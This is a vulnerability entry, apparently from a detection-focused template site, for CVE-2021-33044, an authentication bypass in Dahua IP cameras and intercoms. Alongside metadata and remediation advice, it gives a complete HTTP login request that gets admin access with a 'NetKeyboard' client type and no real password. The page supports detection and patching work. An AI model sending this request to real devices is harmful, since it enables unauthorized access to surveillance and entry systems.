🔙 목록으로 돌아가기

CVE-2021-33044: Dahua IPC/VTH/VTO - Authentication Bypass

TitleDahua IPC/VTH/VTO - Authentication Bypass
Authorgy741
SeverityCritical
ImpactAn attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system.
RemediationApply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability.
CVSS Score9.8
EPSS Score0.94269
CVE IDCVE-2021-33044
CWE IDCWE-287
Tags cve2021 cve dahua auth-bypass seclists dahuasecurity kev vkev vuln

🔍 Vulnerability Description

Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.

🌐 HTTP Request

POST /RPC2_Login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0.
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://www.victim.com
Referer: http://www.victim.com
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-33044.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-33044.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A